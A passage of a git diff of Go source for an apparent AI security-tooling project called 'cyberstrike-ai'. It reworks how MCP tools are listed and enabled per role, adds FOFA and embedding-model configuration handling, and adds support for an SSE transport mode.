}
|
||||
// 如果没有简短描述,使用详细描述的前100个字符
|
||||
if toolInfo.Description == "" {
|
||||
desc := tool.Description
|
||||
if len(desc) > 100 {
|
||||
desc = desc[:100] + "..."
|
||||
|
||||
// 根据角色配置标注工具状态
|
||||
if roleName != "" {
|
||||
if roleUsesAllTools {
|
||||
// 角色使用所有工具,标注启用的工具为role_enabled=true
|
||||
if tool.Enabled {
|
||||
roleEnabled := true
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
} else {
|
||||
roleEnabled := false
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
}
|
||||
} else {
|
||||
// 角色配置了工具列表,检查工具是否在列表中
|
||||
// 内部工具使用工具名称作为key
|
||||
if roleToolsSet[tool.Name] {
|
||||
roleEnabled := tool.Enabled // 工具必须在角色列表中且本身启用
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
} else {
|
||||
// 不在角色列表中,标记为false
|
||||
roleEnabled := false
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
}
|
||||
}
|
||||
toolInfo.Description = desc
|
||||
}
|
||||
|
||||
// 如果有关键词,进行搜索过滤
|
||||
@@ -337,8 +340,8 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
||||
if description == "" {
|
||||
description = mcpTool.Description
|
||||
}
|
||||
if len(description) > 100 {
|
||||
description = description[:100] + "..."
|
||||
if len(description) > 10000 {
|
||||
description = description[:10000] + "..."
|
||||
}
|
||||
|
||||
toolInfo := ToolConfigInfo{
|
||||
@@ -348,6 +351,26 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
||||
IsExternal: false,
|
||||
}
|
||||
|
||||
// 根据角色配置标注工具状态
|
||||
if roleName != "" {
|
||||
if roleUsesAllTools {
|
||||
// 角色使用所有工具,直接注册的工具默认启用
|
||||
roleEnabled := true
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
} else {
|
||||
// 角色配置了工具列表,检查工具是否在列表中
|
||||
// 内部工具使用工具名称作为key
|
||||
if roleToolsSet[mcpTool.Name] {
|
||||
roleEnabled := true // 在角色列表中且工具本身启用
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
} else {
|
||||
// 不在角色列表中,标记为false
|
||||
roleEnabled := false
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 如果有关键词,进行搜索过滤
|
||||
if searchTermLower != "" {
|
||||
nameLower := strings.ToLower(toolInfo.Name)
|
||||
@@ -363,80 +386,62 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
||||
|
||||
// 获取外部MCP工具
|
||||
if h.externalMCPMgr != nil {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
|
||||
defer cancel()
|
||||
// 创建context用于获取外部工具
|
||||
ctx := context.Background()
|
||||
externalTools := h.getExternalMCPTools(ctx)
|
||||
|
||||
externalTools, err := h.externalMCPMgr.GetAllTools(ctx)
|
||||
if err != nil {
|
||||
h.logger.Warn("获取外部MCP工具失败", zap.Error(err))
|
||||
} else {
|
||||
// 获取外部MCP配置,用于判断启用状态
|
||||
externalMCPConfigs := h.externalMCPMgr.GetConfigs()
|
||||
|
||||
for _, externalTool := range externalTools {
|
||||
// 解析工具名称:mcpName::toolName
|
||||
var mcpName, actualToolName string
|
||||
if idx := strings.Index(externalTool.Name, "::"); idx > 0 {
|
||||
mcpName = externalTool.Name[:idx]
|
||||
actualToolName = externalTool.Name[idx+2:]
|
||||
} else {
|
||||
continue // 跳过格式不正确的工具
|
||||
// 应用搜索过滤和角色配置
|
||||
for _, toolInfo := range externalTools {
|
||||
// 搜索过滤
|
||||
if searchTermLower != "" {
|
||||
nameLower := strings.ToLower(toolInfo.Name)
|
||||
descLower := strings.ToLower(toolInfo.Description)
|
||||
if !strings.Contains(nameLower, searchTermLower) && !strings.Contains(descLower, searchTermLower) {
|
||||
continue // 不匹配,跳过
|
||||
}
|
||||
|
||||
// 获取外部工具的启用状态
|
||||
enabled := false
|
||||
if cfg, exists := externalMCPConfigs[mcpName]; exists {
|
||||
// 首先检查外部MCP是否启用
|
||||
if !cfg.ExternalMCPEnable && !(cfg.Enabled && !cfg.Disabled) {
|
||||
enabled = false // MCP未启用,所有工具都禁用
|
||||
} else {
|
||||
// MCP已启用,检查单个工具的启用状态
|
||||
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容)
|
||||
if cfg.ToolEnabled == nil {
|
||||
enabled = true // 未设置工具状态,默认为启用
|
||||
} else if toolEnabled, exists := cfg.ToolEnabled[actualToolName]; exists {
|
||||
enabled = toolEnabled // 使用配置的工具状态
|
||||
} else {
|
||||
enabled = true // 工具未在配置中,默认为启用
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 检查外部MCP是否已连接
|
||||
client, exists := h.externalMCPMgr.GetClient(mcpName)
|
||||
if !exists || !client.IsConnected() {
|
||||
enabled = false // 未连接时视为禁用
|
||||
}
|
||||
|
||||
description := externalTool.ShortDescription
|
||||
if description == "" {
|
||||
description = externalTool.Description
|
||||
}
|
||||
if len(description) > 100 {
|
||||
description = description[:100] + "..."
|
||||
}
|
||||
|
||||
// 如果有关键词,进行搜索过滤
|
||||
if searchTermLower != "" {
|
||||
nameLower := strings.ToLower(actualToolName)
|
||||
descLower := strings.ToLower(description)
|
||||
if !strings.Contains(nameLower, searchTermLower) && !strings.Contains(descLower, searchTermLower) {
|
||||
continue // 不匹配,跳过
|
||||
}
|
||||
}
|
||||
|
||||
allTools = append(allTools, ToolConfigInfo{
|
||||
Name: actualToolName, // 显示实际工具名称,不带前缀
|
||||
Description: description,
|
||||
Enabled: enabled,
|
||||
IsExternal: true,
|
||||
ExternalMCP: mcpName,
|
||||
})
|
||||
}
|
||||
|
||||
// 根据角色配置标注工具状态
|
||||
if roleName != "" {
|
||||
if roleUsesAllTools {
|
||||
// 角色使用所有工具,标注启用的工具为role_enabled=true
|
||||
roleEnabled := toolInfo.Enabled
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
} else {
|
||||
// 角色配置了工具列表,检查工具是否在列表中
|
||||
// 外部工具使用 "mcpName::toolName" 格式作为key
|
||||
externalToolKey := fmt.Sprintf("%s::%s", toolInfo.ExternalMCP, toolInfo.Name)
|
||||
if roleToolsSet[externalToolKey] {
|
||||
roleEnabled := toolInfo.Enabled // 工具必须在角色列表中且本身启用
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
} else {
|
||||
// 不在角色列表中,标记为false
|
||||
roleEnabled := false
|
||||
toolInfo.RoleEnabled = &roleEnabled
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
allTools = append(allTools, toolInfo)
|
||||
}
|
||||
}
|
||||
|
||||
// 如果角色配置了工具列表,过滤工具(只保留列表中的工具,但保留其他工具并标记为禁用)
|
||||
// 注意:这里我们不直接过滤掉工具,而是保留所有工具,但通过 role_enabled 字段标注状态
|
||||
// 这样前端可以显示所有工具,并标注哪些工具在当前角色中可用
|
||||
|
||||
total := len(allTools)
|
||||
// 统计已启用的工具数(在角色中的启用工具数)
|
||||
totalEnabled := 0
|
||||
for _, tool := range allTools {
|
||||
if tool.RoleEnabled != nil && *tool.RoleEnabled {
|
||||
totalEnabled++
|
||||
} else if tool.RoleEnabled == nil && tool.Enabled {
|
||||
// 如果未指定角色,统计所有启用的工具
|
||||
totalEnabled++
|
||||
}
|
||||
}
|
||||
|
||||
totalPages := (total + pageSize - 1) / pageSize
|
||||
if totalPages == 0 {
|
||||
totalPages = 1
|
||||
@@ -457,17 +462,19 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, GetToolsResponse{
|
||||
Tools: tools,
|
||||
Total: total,
|
||||
Page: page,
|
||||
PageSize: pageSize,
|
||||
TotalPages: totalPages,
|
||||
Tools: tools,
|
||||
Total: total,
|
||||
TotalEnabled: totalEnabled,
|
||||
Page: page,
|
||||
PageSize: pageSize,
|
||||
TotalPages: totalPages,
|
||||
})
|
||||
}
|
||||
|
||||
// UpdateConfigRequest 更新配置请求
|
||||
type UpdateConfigRequest struct {
|
||||
OpenAI *config.OpenAIConfig `json:"openai,omitempty"`
|
||||
FOFA *config.FofaConfig `json:"fofa,omitempty"`
|
||||
MCP *config.MCPConfig `json:"mcp,omitempty"`
|
||||
Tools []ToolEnableStatus `json:"tools,omitempty"`
|
||||
Agent *config.AgentConfig `json:"agent,omitempty"`
|
||||
@@ -502,6 +509,12 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
|
||||
)
|
||||
}
|
||||
|
||||
// 更新FOFA配置
|
||||
if req.FOFA != nil {
|
||||
h.config.FOFA = *req.FOFA
|
||||
h.logger.Info("更新FOFA配置", zap.String("email", h.config.FOFA.Email))
|
||||
}
|
||||
|
||||
// 更新MCP配置
|
||||
if req.MCP != nil {
|
||||
h.config.MCP = *req.MCP
|
||||
@@ -522,6 +535,15 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
|
||||
|
||||
// 更新Knowledge配置
|
||||
if req.Knowledge != nil {
|
||||
// 保存旧的嵌入模型配置(用于检测变更)
|
||||
if h.config.Knowledge.Enabled {
|
||||
h.lastEmbeddingConfig = &config.EmbeddingConfig{
|
||||
Provider: h.config.Knowledge.Embedding.Provider,
|
||||
Model: h.config.Knowledge.Embedding.Model,
|
||||
BaseURL: h.config.Knowledge.Embedding.BaseURL,
|
||||
APIKey: h.config.Knowledge.Embedding.APIKey,
|
||||
}
|
||||
}
|
||||
h.config.Knowledge = *req.Knowledge
|
||||
h.logger.Info("更新Knowledge配置",
|
||||
zap.Bool("enabled", h.config.Knowledge.Enabled),
|
||||
@@ -676,10 +698,55 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
|
||||
h.logger.Info("知识库动态初始化完成,工具已注册")
|
||||
}
|
||||
|
||||
// 检查嵌入模型配置是否变更(需要在锁外执行,避免阻塞)
|
||||
var needReinitKnowledge bool
|
||||
var reinitKnowledgeInitializer KnowledgeInitializer
|
||||
h.mu.RLock()
|
||||
if h.config.Knowledge.Enabled && h.knowledgeInitializer != nil && h.lastEmbeddingConfig != nil {
|
||||
// 检查嵌入模型配置是否变更
|
||||
currentEmbedding := h.config.Knowledge.Embedding
|
||||
if currentEmbedding.Provider != h.lastEmbeddingConfig.Provider ||
|
||||
currentEmbedding.Model != h.lastEmbeddingConfig.Model ||
|
||||
currentEmbedding.BaseURL != h.lastEmbeddingConfig.BaseURL ||
|
||||
currentEmbedding.APIKey != h.lastEmbeddingConfig.APIKey {
|
||||
needReinitKnowledge = true
|
||||
reinitKnowledgeInitializer = h.knowledgeInitializer
|
||||
h.logger.Info("检测到嵌入模型配置变更,需要重新初始化知识库组件",
|
||||
zap.String("old_model", h.lastEmbeddingConfig.Model),
|
||||
zap.String("new_model", currentEmbedding.Model),
|
||||
zap.String("old_base_url", h.lastEmbeddingConfig.BaseURL),
|
||||
zap.String("new_base_url", currentEmbedding.BaseURL),
|
||||
)
|
||||
}
|
||||
}
|
||||
h.mu.RUnlock()
|
||||
|
||||
// 如果需要重新初始化知识库(嵌入模型配置变更),在锁外执行
|
||||
if needReinitKnowledge {
|
||||
h.logger.Info("开始重新初始化知识库组件(嵌入模型配置已变更)")
|
||||
if _, err := reinitKnowledgeInitializer(); err != nil {
|
||||
h.logger.Error("重新初始化知识库失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "重新初始化知识库失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
h.logger.Info("知识库组件重新初始化完成")
|
||||
}
|
||||
|
||||
// 现在获取写锁,执行快速的操作
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
// 如果重新初始化了知识库,更新嵌入模型配置记录
|
||||
if needReinitKnowledge && h.config.Knowledge.Enabled {
|
||||
h.lastEmbeddingConfig = &config.EmbeddingConfig{
|
||||
Provider: h.config.Knowledge.Embedding.Provider,
|
||||
Model: h.config.Knowledge.Embedding.Model,
|
||||
BaseURL: h.config.Knowledge.Embedding.BaseURL,
|
||||
APIKey: h.config.Knowledge.Embedding.APIKey,
|
||||
}
|
||||
h.logger.Info("已更新嵌入模型配置记录")
|
||||
}
|
||||
|
||||
// 重新注册工具(根据新的启用状态)
|
||||
h.logger.Info("重新注册工具")
|
||||
|
||||
@@ -699,6 +766,16 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
|
||||
}
|
||||
}
|
||||
|
||||
// 重新注册Skills工具(内置工具,必须注册)
|
||||
if h.skillsToolRegistrar != nil {
|
||||
h.logger.Info("重新注册Skills工具")
|
||||
if err := h.skillsToolRegistrar(); err != nil {
|
||||
h.logger.Error("重新注册Skills工具失败", zap.Error(err))
|
||||
} else {
|
||||
h.logger.Info("Skills工具已重新注册")
|
||||
}
|
||||
}
|
||||
|
||||
// 如果知识库启用,重新注册知识库工具
|
||||
if h.config.Knowledge.Enabled && h.knowledgeToolRegistrar != nil {
|
||||
h.logger.Info("重新注册知识库工具")
|
||||
@@ -737,6 +814,16 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
|
||||
)
|
||||
}
|
||||
|
||||
// 更新嵌入模型配置记录(如果知识库启用)
|
||||
if h.config.Knowledge.Enabled {
|
||||
h.lastEmbeddingConfig = &config.EmbeddingConfig{
|
||||
Provider: h.config.Knowledge.Embedding.Provider,
|
||||
Model: h.config.Knowledge.Embedding.Model,
|
||||
BaseURL: h.config.Knowledge.Embedding.BaseURL,
|
||||
APIKey: h.config.Knowledge.Embedding.APIKey,
|
||||
}
|
||||
}
|
||||
|
||||
h.logger.Info("配置已应用",
|
||||
zap.Int("tools_count", len(h.config.Security.Tools)),
|
||||
)
|
||||
@@ -1058,3 +1145,114 @@ func setFloatInMap(mapNode *yaml.Node, key string, value float64) {
|
||||
valueNode.Value = fmt.Sprintf("%g", value)
|
||||
}
|
||||
}
|
||||
|
||||
// getExternalMCPTools 获取外部MCP工具列表(公共方法)
|
||||
// 返回 ToolConfigInfo 列表,已处理启用状态和描述信息
|
||||
func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo {
|
||||
var result []ToolConfigInfo
|
||||
|
||||
if h.externalMCPMgr == nil {
|
||||
return result
|
||||
}
|
||||
|
||||
// 使用较短的超时时间(5秒)进行快速失败,避免阻塞页面加载
|
||||
timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
externalTools, err := h.externalMCPMgr.GetAllTools(timeoutCtx)
|
||||
if err != nil {
|
||||
// 记录警告但不阻塞,继续返回已缓存的工具(如果有)
|
||||
h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具",
|
||||
zap.Error(err),
|
||||
zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"),
|
||||
)
|
||||
}
|
||||
|
||||
// 如果获取到了工具(即使有错误),继续处理
|
||||
if len(externalTools) == 0 {
|
||||
return result
|
||||
}
|
||||
|
||||
externalMCPConfigs := h.externalMCPMgr.GetConfigs()
|
||||
|
||||
for _, externalTool := range externalTools {
|
||||
// 解析工具名称:mcpName::toolName
|
||||
mcpName, actualToolName := h.parseExternalToolName(externalTool.Name)
|
||||
if mcpName == "" || actualToolName == "" {
|
||||
continue // 跳过格式不正确的工具
|
||||
}
|
||||
|
||||
// 计算启用状态
|
||||
enabled := h.calculateExternalToolEnabled(mcpName, actualToolName, externalMCPConfigs)
|
||||
|
||||
// 处理描述信息
|
||||
description := h.pickToolDescription(externalTool.ShortDescription, externalTool.Description)
|
||||
|
||||
result = append(result, ToolConfigInfo{
|
||||
Name: actualToolName,
|
||||
Description: description,
|
||||
Enabled: enabled,
|
||||
IsExternal: true,
|
||||
ExternalMCP: mcpName,
|
||||
})
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
// parseExternalToolName 解析外部工具名称(格式:mcpName::toolName)
|
||||
func (h *ConfigHandler) parseExternalToolName(fullName string) (mcpName, toolName string) {
|
||||
idx := strings.Index(fullName, "::")
|
||||
if idx > 0 {
|
||||
return fullName[:idx], fullName[idx+2:]
|
||||
}
|
||||
return "", ""
|
||||
}
|
||||
|
||||
// calculateExternalToolEnabled 计算外部工具的启用状态
|
||||
func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool {
|
||||
cfg, exists := configs[mcpName]
|
||||
if !exists {
|
||||
return false
|
||||
}
|
||||
|
||||
// 首先检查外部MCP是否启用
|
||||
if !cfg.ExternalMCPEnable && !(cfg.Enabled && !cfg.Disabled) {
|
||||
return false // MCP未启用,所有工具都禁用
|
||||
}
|
||||
|
||||
// MCP已启用,检查单个工具的启用状态
|
||||
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容)
|
||||
if cfg.ToolEnabled == nil {
|
||||
// 未设置工具状态,默认为启用
|
||||
} else if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists {
|
||||
// 使用配置的工具状态
|
||||
if !toolEnabled {
|
||||
return false
|
||||
}
|
||||
}
|
||||
// 工具未在配置中,默认为启用
|
||||
|
||||
// 最后检查外部MCP是否已连接
|
||||
client, exists := h.externalMCPMgr.GetClient(mcpName)
|
||||
if !exists || !client.IsConnected() {
|
||||
return false // 未连接时视为禁用
|
||||
}
|
||||
|
||||
return true
|
||||
}
|
||||
|
||||
// pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度
|
||||
func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
|
||||
useFull := strings.TrimSpace(strings.ToLower(h.config.Security.ToolDescriptionMode)) == "full"
|
||||
description := shortDesc
|
||||
if useFull {
|
||||
description = fullDesc
|
||||
} else if description == "" {
|
||||
description = fullDesc
|
||||
}
|
||||
if len(description) > 10000 {
|
||||
description = description[:10000] + "..."
|
||||
}
|
||||
return description
|
||||
}
|
||||
|
||||
@@ -8,6 +8,7 @@ import (
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
"gopkg.in/yaml.v3"
|
||||
@@ -36,12 +37,12 @@ func NewExternalMCPHandler(manager *mcp.ExternalMCPManager, cfg *config.Config,
|
||||
func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
|
||||
|
||||
configs := h.manager.GetConfigs()
|
||||
|
||||
|
||||
// 获取所有外部MCP的工具数量
|
||||
toolCounts := h.manager.GetToolCounts()
|
||||
|
||||
|
||||
// 转换为响应格式
|
||||
result := make(map[string]ExternalMCPResponse)
|
||||
for name, cfg := range configs {
|
||||
@@ -54,13 +55,13 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
|
||||
} else {
|
||||
status = "disabled"
|
||||
}
|
||||
|
||||
|
||||
toolCount := toolCounts[name]
|
||||
errorMsg := ""
|
||||
if status == "error" {
|
||||
errorMsg = h.manager.GetError(name)
|
||||
}
|
||||
|
||||
|
||||
result[name] = ExternalMCPResponse{
|
||||
Config: cfg,
|
||||
Status: status,
|
||||
@@ -68,7 +69,7 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
|
||||
Error: errorMsg,
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"servers": result,
|
||||
"stats": h.manager.GetStats(),
|
||||
@@ -78,17 +79,17 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
|
||||
// GetExternalMCP 获取单个外部MCP配置
|
||||
func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
|
||||
name := c.Param("name")
|
||||
|
||||
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
|
||||
|
||||
configs := h.manager.GetConfigs()
|
||||
cfg, exists := configs[name]
|
||||
if !exists {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "外部MCP配置不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
client, clientExists := h.manager.GetClient(name)
|
||||
status := "disconnected"
|
||||
if clientExists {
|
||||
@@ -98,7 +99,7 @@ func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
|
||||
} else {
|
||||
status = "disabled"
|
||||
}
|
||||
|
||||
|
||||
// 获取工具数量
|
||||
toolCount := 0
|
||||
if clientExists && client.IsConnected() {
|
||||
@@ -106,13 +107,13 @@ func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
|
||||
toolCount = count
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
// 获取错误信息
|
||||
errorMsg := ""
|
||||
if status == "error" {
|
||||
errorMsg = h.manager.GetError(name)
|
||||
}
|
||||
|
||||
|
||||
c.JSON(http.StatusOK, ExternalMCPResponse{
|
||||
Config: cfg,
|
||||
Status: status,
|
||||
@@ -128,38 +129,38 @@ func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
name := c.Param("name")
|
||||
if name == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
// 验证配置
|
||||
if err := h.validateConfig(req.Config); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
|
||||
// 添加或更新配置
|
||||
if err := h.manager.AddOrUpdateConfig(name, req.Config); err != nil {
|
||||
h.logger.Error("添加或更新外部MCP配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "添加或更新配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
// 更新内存中的配置
|
||||
if h.config.ExternalMCP.Servers == nil {
|
||||
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
|
||||
}
|
||||
|
||||
|
||||
// 如果用户提供了 disabled 或 enabled 字段,保留它们以保持向后兼容
|
||||
// 同时将值迁移到 external_mcp_enable
|
||||
cfg := req.Config
|
||||
|
||||
|
||||
if req.Config.Disabled {
|
||||
// 用户设置了 disabled: true
|
||||
cfg.ExternalMCPEnable = false
|
||||
@@ -185,16 +186,16 @@ func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
|
||||
cfg.Enabled = true
|
||||
cfg.Disabled = false
|
||||
}
|
||||
|
||||
|
||||
h.config.ExternalMCP.Servers[name] = cfg
|
||||
|
||||
|
||||
// 保存到配置文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
h.logger.Info("外部MCP配置已更新", zap.String("name", name))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "配置已更新"})
|
||||
}
|
||||
@@ -202,28 +203,28 @@ func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
|
||||
// DeleteExternalMCP 删除外部MCP配置
|
||||
func (h *ExternalMCPHandler) DeleteExternalMCP(c *gin.Context) {
|
||||
name := c.Param("name")
|
||||
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
|
||||
// 移除配置
|
||||
if err := h.manager.RemoveConfig(name); err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "配置不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
// 从内存配置中删除
|
||||
if h.config.ExternalMCP.Servers != nil {
|
||||
delete(h.config.ExternalMCP.Servers, name)
|
||||
}
|
||||
|
||||
|
||||
// 保存到配置文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
h.logger.Info("外部MCP配置已删除", zap.String("name", name))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "配置已删除"})
|
||||
}
|
||||
@@ -231,10 +232,10 @@ func (h *ExternalMCPHandler) DeleteExternalMCP(c *gin.Context) {
|
||||
// StartExternalMCP 启动外部MCP
|
||||
func (h *ExternalMCPHandler) StartExternalMCP(c *gin.Context) {
|
||||
name := c.Param("name")
|
||||
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
|
||||
// 更新配置为启用
|
||||
if h.config.ExternalMCP.Servers == nil {
|
||||
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
|
||||
@@ -242,32 +243,32 @@ func (h *ExternalMCPHandler) StartExternalMCP(c *gin.Context) {
|
||||
cfg := h.config.ExternalMCP.Servers[name]
|
||||
cfg.ExternalMCPEnable = true
|
||||
h.config.ExternalMCP.Servers[name] = cfg
|
||||
|
||||
|
||||
// 保存到配置文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
// 启动客户端(立即创建客户端并设置状态为connecting,实际连接在后台进行)
|
||||
h.logger.Info("开始启动外部MCP", zap.String("name", name))
|
||||
if err := h.manager.StartClient(name); err != nil {
|
||||
h.logger.Error("启动外部MCP失败", zap.String("name", name), zap.Error(err))
|
||||
c.JSON(http.StatusBadRequest, gin.H{
|
||||
"error": err.Error(),
|
||||
"error": err.Error(),
|
||||
"status": "error",
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
// 获取客户端状态(应该是connecting)
|
||||
client, exists := h.manager.GetClient(name)
|
||||
status := "connecting"
|
||||
if exists {
|
||||
status = client.GetStatus()
|
||||
}
|
||||
|
||||
|
||||
// 立即返回,不等待连接完成
|
||||
// 客户端会在后台异步连接,用户可以通过状态查询接口查看连接状态
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
@@ -279,16 +280,16 @@ func (h *ExternalMCPHandler) StartExternalMCP(c *gin.Context) {
|
||||
// StopExternalMCP 停止外部MCP
|
||||
func (h *ExternalMCPHandler) StopExternalMCP(c *gin.Context) {
|
||||
name := c.Param("name")
|
||||
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
|
||||
// 停止客户端
|
||||
if err := h.manager.StopClient(name); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
// 更新配置
|
||||
if h.config.ExternalMCP.Servers == nil {
|
||||
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
|
||||
@@ -296,14 +297,14 @@ func (h *ExternalMCPHandler) StopExternalMCP(c *gin.Context) {
|
||||
cfg := h.config.ExternalMCP.Servers[name]
|
||||
cfg.ExternalMCPEnable = false
|
||||
h.config.ExternalMCP.Servers[name] = cfg
|
||||
|
||||
|
||||
// 保存到配置文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
h.logger.Info("外部MCP已停止", zap.String("name", name))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "外部MCP已停止"})
|
||||
}
|
||||
@@ -324,10 +325,10 @@ func (h *ExternalMCPHandler) validateConfig(cfg config.ExternalMCPServerConfig)
|
||||
} else if cfg.URL != "" {
|
||||
transport = "http"
|
||||
} else {
|
||||
return fmt.Errorf("需要指定command(stdio模式)或url(http模式)")
|
||||
return fmt.Errorf("需要指定command(stdio模式)或url(http/sse模式)")
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
switch transport {
|
||||
case "http":
|
||||
if cfg.URL == "" {
|
||||
@@ -337,10 +338,14 @@ func (h *ExternalMCPHandler) validateConfig(cfg config.ExternalMCPServerConfig)
|
||||
if cfg.Command == "" {
|
||||
return fmt.Errorf("stdio模式需要command")
|
||||
}
|
||||
case "sse":
|
||||
if cfg.URL == "" {
|
||||
return fmt.Errorf("SSE模式需要URL")
|
||||
}
|
||||
default:
|
||||
return fmt.Errorf("不支持的传输模式: %s,支持的模式: http, stdio", transport)
|
||||
return fmt.Errorf("不支持的传输模式: %s,支持的模式: http, stdio, sse", transport)
|
||||
}
|
||||
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
@@ -424,17 +429,17 @@ func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig, origi
|
||||
root := doc.Content[0]
|
||||
externalMCPNode := ensureMap(root, "external_mcp")
|
||||
serversNode := ensureMap(externalMCPNode, "servers")
|
||||
|
||||
|
||||
// 清空现有服务器配置
|
||||
serversNode.Content = nil
|
||||
|
||||
|
||||
// 添加新的服务器配置
|
||||
for name, serverCfg := range cfg.Servers {
|
||||
// 添加服务器名称键
|
||||
nameNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: name}
|
||||
serverNode := &yaml.Node{Kind: yaml.MappingNode, Tag: "!!map"}
|
||||
serversNode.Content = append(serversNode.Content, nameNode, serverNode)
|
||||
|
||||
|
